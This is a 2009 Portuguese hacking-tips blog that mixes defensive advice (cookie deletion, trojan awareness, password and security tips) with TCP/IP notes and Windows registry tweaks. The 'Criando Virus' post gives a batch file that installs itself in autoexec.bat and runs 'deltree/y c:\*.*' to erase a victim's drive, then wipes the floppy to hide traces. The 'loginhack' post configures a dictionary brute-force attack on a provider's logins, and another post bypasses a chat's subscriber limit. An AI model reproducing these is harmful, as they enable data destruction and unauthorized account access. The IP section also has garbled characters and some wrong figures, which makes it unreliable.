Mostrando postagens com marcador Dicas e Truques.. Mostrar todas as postagens
Mostrando postagens com marcador Dicas e Truques.. Mostrar todas as postagens

domingo, 22 de março de 2009

Excluindo seus Cookies !

Se você foi vitima de algum Lammer que roubou seus cookies faça o seguinte :No Internet Explorer vá em : Ferramentas,/Opçoes da internet,/Cookies,/Excluir Cookies,/Dê um OK e um finalizar e Pronto !No Mozilla FireFox vá em : Ferramentas,/Opçoes,/Privacidade,/Exibir Cookies,/Excluir cookies,/Ou Limpar dados pessoais ao sair do Mozilla FireFox !

Cookies

Cookie é um tipo de arquivo que armazena no seu micro as configurações escolhidas para uma determinada página ou site . Quando você retornar àquela página , as informações gravadas no cookie serão enviadas para o site , com o nobre objetivo de não apenas reduzir o tempo de acesso mas para personalizá-lo .Perigo e PrivacidadeHá mais de uma maneira de utilizar "cookies" para rastrear a navegação na rede . A modalidade que representa a maior ameaça à privacidade do internauta é conhecida como "web bug" (grampo da rede) .Ela funciona da seguinte maneira : suponha que você visite um determinado site e receba um "cookie" enviado pela empresa X . Cada cookie , que nada mais é do que um arquivo txt , traz um número de série único que é atribuído ao seu computador .Em seguida , você visita outro site onde a mesma empresa X também envia cookies . Ao entrar nessa página , os computadores da empresa X reconhecem o número de identificação do seu cookie e acrescentam o endereço visitado a um prontuário digital sobre a sua máquina . Se nada for feito , e você continuar visitando sites onde há cookies dessa mesma empresa , após alguns dias ela terá uma coleção com os endereços que você visitou . Mas ainda não é possível relacionar esses dados com o seu nome , endereço ...Embora improvável , essa associação é tecnicamente possível : basta que você forneça seus dados pessoais para algum site que se disponha a compartilhá-los com a empresa X .A DoubleClick http://www.doubleckick.com , empresa que gerencia a maior rede de cookies da Internet , nega adotar qualquer um desses procedimentos .O problema é que , como o cookie passa sempre por baixo das pernas do proprietário do micro , quem pode garantir que ele contenha somente informações referentes ao site ? Será que ele , já que esteve ali no micro , sem fazer nada , não anotou uns dados importantes e depois , despretensiosamente , comentou com as pessoas do site ?Defesa e SoluçãoSe você prefere melhorar a sua privacidade sozinho a confiar em empresas , há vários programas e soluções que podem ajudá-lo .Como muitos sites não funcionam sem cookies , a única solução é utilizar um software regulador de cookies .Configurar o browser para não aceitar cookies ;Download do Cookie Viewer Clique aquiDownload : 290 KbytesDescrição : Programa gratuíto ; permite a visualização e o apagamento dos cookies armazenados no PC .http://www.winmag.com/Download do IDcide Clique aquiDownload : 1.31 MbytesDescrição : Programa gratuíto ; permite o controle e monitoramento dos cookies enviados para o computador do usuário , exibundo o endereço das páginas que estão tentando bisbilhotar o computador ; requer o IE 4 ou superior .http://www.idcide.comÉ perfeitamente possível apagar os "cookies" manualmente , mas como eles podem ser armazenados em várias pastas do micro , você pode acabar esquecendo de eliminar algunsInternet Explorer e NetscapeUma opção presente no Internet Explorer é permitir que somente alguns sites enviem os arquivos . Para ativá-la , clique em Ferramentas , Opções da Internet , Segurança , Sites confiáveis , Sites e digite os endereços de cada um . Em seguida , altere o nível de segurança para Médio .Os navegadores da Netscape permitem um truque para entrar em sites que exigem cookies sem recebê-los : apague o arquivo cookie.txt (ele fica na pasta Users , dentro do diretório Netscape) , crie outro com o mesmo nome e salve-o no mesmo lugar . Depois clique como o botão direito , escolha Propriedades e marque o item Somente leitura .

Endereços IP

Os endereços IP são números com 32 bits, normalmente escritos como quatro octetos (em decimal), por exemplo 128.6.4.7. A primeira parte do endereço identifica uma rede especifica na inter-rede, a segunda parte identifica um host dentro dessa rede. Devemos notar que um endereço IP não identifica uma máquina individual, mas uma conexão à inter-rede. Assim, um gateway conectando à n redes tem n endereços IP diferentes, um para cada conexão.
Os endereços IP podem ser usados para nos referirmos a redes quanto a um host individual. Por convenção, um endereço de rede tem o campoidentificador de host com todos os bits iguais a 0 (zero). Podemos também nos referir a todos os hosts de uma rede através de um endereço por difusão, quando, por convenção, o campo identificador de host deve ter todos os bits iguais a 1 (um). Um endereço com todos os 32 bits iguais a 1 e considerado um endereço por difusão para a rede do host origem do datagrama. O endereço 127.0.0.0 e reservado para teste (loopback) e comunicação entre processos da mesma máquina. IP utiliza três classes diferentes de endereços.
A definição de classes de endereços deve-se ao fato do tamanho das redes que compõem a inter-rede variar muito, indo desde redes locais de computadores de pequeno porte, até redes públicas interligando milhares de hosts. Na primeira classe de endereços, classe A, o bit mais significativo e 0 (zero), os outros 7 bits do primeiro octeto identificam a rede, e os 24 bits restantes definem o endereço local. Essa classe de endereços e usada para redes de grande porte, os endereços de rede variam de 1 a 256, e cada redetem capacidade de endereçar cerca de 16 milhões de hosts. A Arpanet e um exemplo de uma rede com endereços classe A. A classe B de endereços usa dois octetos para o número da rede e dois para endereços de hosts. Os endereços de redes classe B variam na faixa de 128.1 até 191.255 (os números 0 e 255 do segundo octeto, e 127 no primeiro são usados para funções especiais), e cada rede pode interligar cerca de 65 mil hosts.Finalmente, os endereços classe C utilizam três octetos para identificar a rede e um para o host. Os endereços de rede situam-se na faixa de 192.1.1 até 223.254.254, e cada rede pode endereçar 254 hosts. Os endereços acima de 223 no primeiro octeto foram reservados para uso futuro.
O Protocolo IP (Internet Protocol) O IP foi projetado para permitir a interconexão de redes de computadores queutilizam a tecnologia de comutação de pacotes. O ambiente inter-rede consiste em hosts conectados a redes que por sua vez sao interligadas através de gateways. As redes que fazem parte da inter-rede variam de redes locais (por exemplo, redes Ethernet) até redes de grande porte (por exemplo, a Arpanet).Os gateways da Internet são também chamados de routers (roteadores). Ao contr rio do protocolo X.25, o protocolo IP e um protocolo sem conexões. Sua função e transferir blocos de dados denominados datagramas da origem para o destino, onde a origem e o destino são hosts identificados por endereços IP. O protocolo IP também fornece o serviço de fragmentação e remontagem de datagramas longos, quando necessário, para que eles possam ser transmitidos através de redes onde o tamanho máximo permitido para os pacotes e pequeno. O serviço oferecido pelo IP ‚ sem conexão. Portanto, cada datagrama IP ‚ tratado como uma unidade independente que não possui nenhuma relação com qualquer outro datagrama. A comunicação ‚ não-confiável, não sendo usados reconhecimentos fim a fim ou entre nós intermediários. Nenhum mecanismo de controle de erros nos dados transmitidos ‚ utilizado, exceto um checksum do cabeçalho que garante asinformações nele contidas, que são usadas pelos gateways para encaminhar os datagramas, estão corretas. Nenhum mecanismo de controle de fluxo ‚ empregado. Algumas das principais caracter¡sticas desse protocolo são: Serviço de datagrama não-confiável Endereçamento hierárquico Facilidade de fragmentação e remontagem de pacotes Identificação da importância do datagrama e do n¡vel de confiabilidade exigido Identificação da urgência de entrega e da ocorrência futura ou não de pacotes na mesma direção (pré-alocação, controle de congestionamento) Campo especial indicando qual o protocolo de transporte a ser utilizado no n¡vel superior Roteamento adaptativo distribu¡do nos gateways Descarte e controle de tempo de vida dos pacotes inter-redes no gateway Alexandre Lopes - ALL, Endereços IP em Redes TCP/IP Toda interface de host ou nó emuma rede TCP/IP ‚ identificada por um endereço IP exclusivo. Esse endereço ser utilizado para identificar o host em uma rede; ele especifica também informações de roteamento em inter-redes. O endereço IP identifica um computador como um endereço de 32 bits exclusivo através de uma rede TCP/IP. Um endereço ‚ em geral representado por uma notação de decimais separados por ponto, que representa cada octeto de um endereço IP como seu valor decimal e separa cada octeto com um ponto. Ex: 102.54.94.97 ID de Rede e ID de Host Embora um endereço IP seja um valor único, ele contém duas partes de informações: a ID de rede e a ID de host (ou sistema) referente ao seu computador. -A ID de rede identifica um grupo decomputadores e outros dispositivos, todos localizados em uma mesma rede lógica, separados ou conectados entre si por roteadores. Em inter-redes (redes formadas por um conjunto de redes locais), há uma ID de rede exclusiva para cada rede. -A ID de host identifica o seu computador dentro de uma ID de rede espec¡fica. (Host ‚ qualquer dispositivo conectado com a rede que utilize TCP/IP) As redes conectadas com a Internet deverão obter uma ID de rede oficial na InterNIC para garantir uma exclusividade de ID de rede IP. Depoisde receber a ID de rede, o administrador da rede local dever tribuir IDs de host exclusivas aos computadores da rede local. Embora as redes privativas não conectadas com a Internet possam escolher utilizar seus próprios identificadores de rede, uma ID de rede válida da InterNIC permitir que uma rede privativa estabeleça conexão com a Internet posteriormente sem que seja preciso atribuir endereços novamente. A comunidade Internet definiu classes de endereços, de forma a acomodar redes de diferentes tamanhos. Cada classe de rede poder ser identificada a partir do primeiro octeto de seu endereço IP. A tabela a seguir apresenta um resumo do relacionamento entreo primeiro octeto de um endereço espec¡fico e seus campos de ID de host e Id de rede. Ela também identifica o número total de IDs de rede e IDs de hosts para cada classe de endereço. Esse exemplo usar w.x.y.z para designar os bytes do endereço IP. Classes de Endereços IP Classe Valores w ID de rede ID de host Redes Disp. Host/Rede A 1-126 w x.y.z 126 16.777.214 B 128-191 w.x y.z 16.384 65.534 C 192-223 w.x.y z 2.097.151 254 Nota: O endereço 127 ‚ reservado para teste de loopback e comunicações entre processos no computador local; não é um endereço de rede válido. Os endereços 224 e acima são reservados para protocolos especiais (IGPM multicast) e não podem ser utilizados comoendereços de host. Um host de rede utiliza uma ID de rede e uma ID de host para determinar qual pacote deve receber ou ignorar e para determinar o escopo de suas transmissões (apenas os nós com a mesma ID de rede suportam broadcasts no n¡vel do IP). Pelo fato de o endereço IP do remetente estar inclu¡do em todos os pacotes IP de sa¡da, ser útil para o computador de destino obter a ID de rede de origem e a ID de host do campo de endereço IP. Isso ser feito através de máscaras de sub-rede. []s,DP ___ * UniQWK #1151* A estrada do sucesso est sempre em obras !! - Máscaras de Sub-Rede As máscaras de sub-rede são valores de 32 bits que permitem que os destinatários de pacotes de ID distingam a parte ID da rede do endereço IP da ID do host. Assim como um endereço IP, o valor deuma máscara de sub-rede ‚ com frequência representado em notação dedecimais separados por ponto. As máscaras de sub-rede são determinadas pela atribuição de bits 1 aos bits que pertencem à ID da rede e de 0 aos bits que pertencem à ID do host.Conforme tabela a seguir. Máscaras de Sub-Rede Padrão para Classes de Endereços IP Padrão -------- -- -------- ------ ---- ------- -- --------- -- ------ Classes Bits Máscara de Sub-Rede A 11111111 00000000 00000000 00000000 255.0.0.0 B 11111111 11111111 00000000 00000000 255.255.0.0 C 11111111 11111111 11111111 00000000 255.255.255.0 O resultado permite que o TCP/IP determine o host e as IDs de rede do computador local. Por exemplo, quando um endereço IP for 102.54.94.97 e a máscara de sub-rede for 255.255.0.0, a ID de rede ser 102.54 e a ID de host ser 94.97. Embora a configuração de um host com a m scara de sub-rede possa parecer redundante depois de examinar as tabelasanteriores (já que a classe do host pode ser facilmente determinada), as máscaras de sub-rede também serão utilizadas para segmentar uma ID de rede atribu¡da entre diversas redes locais. Por ex, suponha que seja atribuída a uma rede o endereço 144.100 de Classe B. Esse ‚ um dos mais de 16000 endereços da classe B capazes de servir a mais de 65000 nós. No entanto, a rede corporativa internacional à qual essa ID foi atribu¡da ‚ composta por 12 redes locais internacionais com 75 a 100 nós cada. Em vez de solicitar mais 11 IDs de rede, ser melhor utilizar a sub-rede para fazer um uso mais eficiente da ID 144.100 atribu¡da. O terceiro octeto do endereço IP poder ser utilizadocomo uma ID de sub-rede, para definir a máscara de sub-rede 55.255.255.0. Isso dividir o endereço de Classe B em 254 sub-redes; 144.100.1 até 144.100.254, cada uma delas com 254 nós. (As IDs de host 0 e 255 não deverão ser atribu¡das a um computador; elas são usadas como endereços de broadcast, em geral reconhecidas por todos os computadores). Qualquer um desses 254 endereços de rede poderá ser atribu¡do às redes locais internacionais nesse exemplo. Dentro de cada rede local, será atribuída uma única ID de host exclusiva, e todas terão a máscara de sub-rede 255.255.255.0. O exemplo anterior demosntrou um esquema de sub-rede simples (e comum) para endereços de Classe B. Eventualmente será necessário segmentar apenas parte de um octeto utilizando apenas alguns bits para especificar as IDs de sub-rede (como quando as sub-redes excedem 256 nós). Cada usuário dever verificar com o administrador de rede local para determinar a diretriz de sub-rede da rede e a máscara de sub-rede correta. Amáscara de sub-rede deverá ser a mesma para essa ID de rede em todos os sistemas da rede local.

Cavalos de Tróia

1. Saiba o que são os cavalos de TróiaCavalos de Tróia são programas que vem escondidos dentro de outros sem que o usuário saiba de sua existência. Eles podem permitir que outra pessoa obtenha controle sobre a máquina de um internauta conectado à Internet.Atualmente, o recursos tem sido amplamente utilizado para invadir máquinas conectadas à Internet. A tática é simples: mandar um programa qualquer (protetores de tela ou animações engraçadinhas, por exemplo), que na verdade contém inserido um outro que dá ao cracker acesso remoto à máquina onde o cavalo de Tróia foi instalado. Esses softwares são verdadeiras portas de acesso ao conteúdo do computador.Os Cavalos de Tróia permitem que outra pessoa obtenha controle sobre a máquina do usuário, através do protocolo TCP/IP da Internet. Testes demonstraram que o administrador remoto é capaz de acessar dados e efetuar tarefas com mais eficiência do que o próprio usuário que está em frente à máquina.
2. Conheça os programas Back Orifice, Netbus, Sockets de Tróie e outrosEntre os principais troianos estão o Back Orifice (BO), que se instala em micros que rodam o Windows 95/98, o NetBus, capaz de rodar também no Windows NT, o Master's Paradise 98 e o Sockets de Troie (ST). Todos apresentam características semelhantes: permitem administração remota, revelam as senhas contidas no sistema operacional do usuário e mostram em tempo real tudo aquilo que é digitado.
3. Dicas para evitar a invasão de seu micro- Proteja e troque a sua senhaO controle deve começar pela identidade digital do usuário. User e senha são identificações particulares que merecem o máximo cuidado e sigilo. Com certeza, ninguém gostaria de compartilhar a sua senha bancária ou o número do seu cartão de crédito com mais alguém. O mesmo deve acontecer com a sua senha de acesso.A troca periódica da senha é um bom começo para quem não quer dar chance ao azar. A maioria dos provedores de acesso oferece esse serviço online. Para maior segurança, o usuário deve utilizar senhas relativamente complexas. No mínimo, utilize uma senha alfanumérica com 6 caracteres. Mantenha o hábito de conferir o extrato detalhado da utilização da sua conta de acesso. Ao notar qualquer alteração no número de horas utilizadas, entre em contato com administração do seu provedor.Isso evita alguns problemas, mas não funciona se o seu computador já tiver um cavalo de Tróia instalado. Isso porque alguns desses programas permitem ao cracker roubar a sua senha do seu próprio micro. Nesse caso, é necessário desinstalar o troiano de sua máquina, antes de mais nada. Para saber se há algum cavalo de Tróia instalado em sua máquina, você precisa de um programa detector.
- Não execute programas de origem duvidosaAntes de mais nada, para evitar que a sua máquina seja vítima de um ataque deste tipo, recomendamos que você pense duas vezes entes de rodar qualquer arquivo executável (qq_coisa.exe) encontrado na rede ou recebido por e-mail. Mesmo que você receba um executável de um conhecido ou amigo, procure saber antes a procedência do mesmo.
- Seja cauteloso com o IRC e ICQMuitos dos programas de IRC tem bugs conhecidos que permitem aos usuarios enviar executáveis para outros, em certas circunstâncias. Não aceite programas (jogos, screensavers etc.) recebidos via IRC porque não há como saber quem o está enviando, e também nunca se deve deixar o IRC aceitando automaticamente transmissões de arquivos ou executando scripts. As mesmas precauções valem para o ICQ. Não acredite em noticias recebidas ao acaso dizendo coisas como "use este programa para atualizar seu ICQ" ou "rode este patch para proteger seu Explorer" etc. Se receber algo assim, confira sempre as notícias no site do fabricante do software em questão.
- Atualize o seu navegador periodicamenteAlém da troca de senha, o usuário precisa manter seus softwares sempre atualizados. Tanto o navegador da Netscape quanto o da Microsoft (Internet Explorer) já apresentaram bugs de segurança em quase todas as suas versões. Tão logo estes bugs são descobertos, as respectivas fabricantes oferecem patches de correção para os problemas. Visitas regulares ao site da fabricante do seu navegador preferido o ajudarão na coleta de informações sobre os bugs e suas respectivas correções.
4. Copie programas para se defenderPara evitar que a sua máquina seja vítima do ataque de um cracker utilize um Firewall.

Como adivinhar uma senha

Uma senha fácil de se deduzir é a causa mais comum dos problemas de segurança. Se você não souber como trocar a sua senha, coloque essa tarefa como item número 1 da sua lista de coisas a aprender. Você nunca deve criar senhas tomando por base o seu próprio nome - mesmo que seja o seu nome de trás para frente. A senha não pode também ser fácil de se adivinhar, como o nome do marido ou mulher, do namorado ou namorada, do seu cão, a placa do carro, a rua onde mora, a data do nascimento - ou outra informação conhecida. Os hackers costumam usar os programas e dicionários on-line para adivinhar expressões como dedicação. Como podem ser as senhas então? Não há pistas, certo? Pois bem, seja criativo. Pegue a sua frase preferida, como Até que a morte nos separe, querida e utilize a primeira letra de cada palavra aqamnsq. Dessa forma, a senha não é propriamente uma palavra, mas é fácil; de lembrar e difícel de adivinhar. Você pode também combinar palavras com números, o que é bem aconselhável. Mas nunca crie uma senha somente com números, é muito mais fácil de adivinhar.

Hackeando provedores com o loginhack

O que esse programa faz é conectar-se ao provedor e testar as diver- sas senhas de uma wordlist para consegir estabelecer uma conexão. Primeiro vc deve acertar seu script. Eu uso o Dec-serv feito pelo Tron X e que jah vem por default com o programa. Edite-o e mude as linhas:init_modem=zinit_data=8n1LOGFILE=xxxxxx.logPHONE_NR=xxxxxxDIAL_TRIES=0LOGIN_TRIES=0DIC(1)=word.dicParainit_modem=atzinit_data=8n1LOGFILE=uol.logPHONE_NR=2100045DIAL_TRIES=0LOGIN_TRIES=0DIC(1)=wordlist.dicAcima estão as configurações necesarias para hackear a uol. Mude-as adequadamente ao seu provedor. Para compila-lo use o Lh-comp.exe assim:lh-comp dec-serv.txtIsso criará o dec-serv.scr . Agora rode o programa. Se ainda precisar configurar os dados acima entre no Setup. Se está tudo certo selecione Load compiled Script [L]. Ae quando pedir o nome do script digite ? para lista-los. Então digite o nome do script(se fez tudo certo será dec-serv.scr). Após carregar o script digite S para iniciar. Pronto! Agora é só esperar que talvéz demore um pouco.
Obs: Tudo o que vocês fizerem eu não me responsabilizo por nada, a responsabilidade é toda sua!!!!!!!!!!!!!

terça-feira, 3 de março de 2009

Criando Virus

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.Entre com os comandos: @ECHO OFF e BREAK OFF . A página deverá ficar da seguinte maneira, como está abaixo:@ECHO OFFBREAK OFFDepois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte comando:deltree/y c:\*.*Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.OBS: Eu não me responsabilizo por nada que você fizer!!!
artigo original de:☻Hacker Dicas☻

Entrando no chat da uol com mais de 30 pessoas

Acho que quase todo mundo ja sabe que quando as salas de bate papo da Uol utrapassa o numero de 30 pessoas só assinantes entra na sala. Eu ensinarei uma forma simples de burlar essa proibição.1º Você entra no site da Uol http://www.uol.com.br/ clica em bate papo.2º Escolhe uma categoria de sala de bate papo.3º Na que estiver com mais de 30 pessoas você clica com o lado direito do mouse no incone dos pés (entrar) e clica em copiar atalho.4º Você cola o atalho na sua barra de endereços. Vai ficar tipo assim: javascript:entra_sala(33,143744).5º Você apaga o 33 ou o numero que estiver acima de 30 do (33,143744) e coloca 19.6º De um enter e pronto.

F3 - The Best Songs

Musicas01 - Adam's Song02 - Basket Case03 - Check04 - Dead05 - First Date06 - From Yesterday07 - Holiday08 - Jesus Of Suburbia09 - Let Me Go10 - May 1611 - New Girl12 - No Ciga13 - Not The Same14 - Perfect15 - Someday16 - Spokesman17 - St Jimmy18 - Sweet Child O Mine19 - TNT20 - Wake Me Up When September Ends21 - Welcome To My Life22 - When I Come Around

Download

Dicas de segurança

1 - Sempre utilize um antivirus em sua maquina, e o principal,mantenha-o atualizado.2 - Sempre realize os updates do seu sistema operacional (atualizões) pois falhas críticas de segurança sempre são descobertas.Obs: O sistema operacional que mais deve ser realizado updates para mim é o Windows, pois temos mais usuarios, portanto é um alvo maior para Crackers.3 - Possua sempre um programa contra adwares e spywares, as vezes o antivírus não é capaz de detectar malwares sozinho.4 - Cuidado ao abrir arquivos anexados por e-mail, principalmente quando as extenções forem do tipo: .exe, .bat, etc.5 - Cuidado com seus "amigos", sempre desconfie de qualquer arquivo que você recebe por e-mail ou messengers, passe sempre um bom antivírus antes.6 - Estude spobre a engenharia social para que você não seja vítima dela. A engenharia social consiste numa técnica de enganar as pessoas para conseguir informações pessoais.7 - Use um Firewall.8 - Use sempre senhas seguras, contendo letras e números,de preferencia com mas de 8 digitos, para dificultar a ação de programas de forçabruta.9 - Estude como os Cackers agem, pois assim você saberá como se defender.10 - Quando você for testar algum vírus ou programa hacker, teste-o em uma maquina virtual, pois não comprometera seu PC. O VMware é um programa que cria a maquina virtual.Isto é só um pouco de muitos modos que você deve se defender!

sábado, 21 de fevereiro de 2009

Como Abrir Pastas Mais Rápido

OBS: Só funciona no Windows XP

1 - Vá no iniciar, depois executar e digite: SYSTEM.INI

2 - Encontre a chave (386enh), posicione o cursor de texto na frente desta linha e dê um enter pra criar uma nova linha

3) Na linha vazia cole o comando abaixo:

conservativeswapfileusage=1

Exemplo de como ficará o arquivo depois de modificado:

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
conservativeswapfileusage=1
woafont=app850.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

4) Salve o arquivo modificado e feche o bloco de notas.

Aumentando a Velocidade do Download

Vá em:
Iniciar > executar > digite "regedit" (sem aspas)

Irá abrir uma "pasta"
ai vc irá navegar em:
HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion >InternetSettings

depois clique em adicionar valor, adicione os valores dword seguintes:

MaxConnectionsPer1_0Server=Dword:0000000a

MaxConnectionsPerServer=Dword:0000000a